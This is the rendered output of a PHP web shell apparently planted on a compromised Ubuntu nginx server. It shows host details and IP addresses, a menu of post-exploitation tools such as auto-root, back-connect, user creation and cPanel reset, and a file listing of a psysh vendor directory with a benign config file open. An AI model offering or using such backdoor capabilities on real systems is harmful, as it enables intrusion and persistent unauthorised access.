Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdgamatya /
vendor /
psy /
psysh /
[ HOME SHELL ]
Name
Size
Permission
Action
.phan
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.editorconfig
200
B
-rw-r--r--
.gitignore
127
B
-rw-r--r--
.php_cs
1.13
KB
-rw-r--r--
.styleci.yml
355
B
-rw-r--r--
.travis.yml
791
B
-rw-r--r--
CONTRIBUTING.md
927
B
-rw-r--r--
LICENSE
1.08
KB
-rw-r--r--
README.md
1.93
KB
-rw-r--r--
composer.json
1.78
KB
-rw-r--r--
phpunit.xml.dist
331
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .php_cs
<?php use Symfony\CS\Config\Config; use Symfony\CS\FixerInterface; use Symfony\CS\Fixer\Contrib\HeaderCommentFixer; $header = <<<EOF This file is part of Psy Shell. (c) 2012-2017 Justin Hileman For the full copyright and license information, please view the LICENSE file that was distributed with this source code. EOF; HeaderCommentFixer::setHeader($header); $config = Config::create() // use symfony level and extra fixers: ->level(FixerInterface::SYMFONY_LEVEL) ->fixers(array( 'align_double_arrow', 'concat_with_spaces', 'header_comment', 'long_array_syntax', 'ordered_use', 'strict', '-concat_without_spaces', '-method_argument_space', '-pre_increment', '-unalign_double_arrow', '-unalign_equals', '-no_empty_comment', // stop removing slashes in the middle of multi-line comments )) ->setUsingLinter(false); $finder = $config->getFinder() ->in(__DIR__) ->name('.php_cs') ->name('build-manual') ->name('build-phar') ->exclude('build-vendor'); return $config;
Close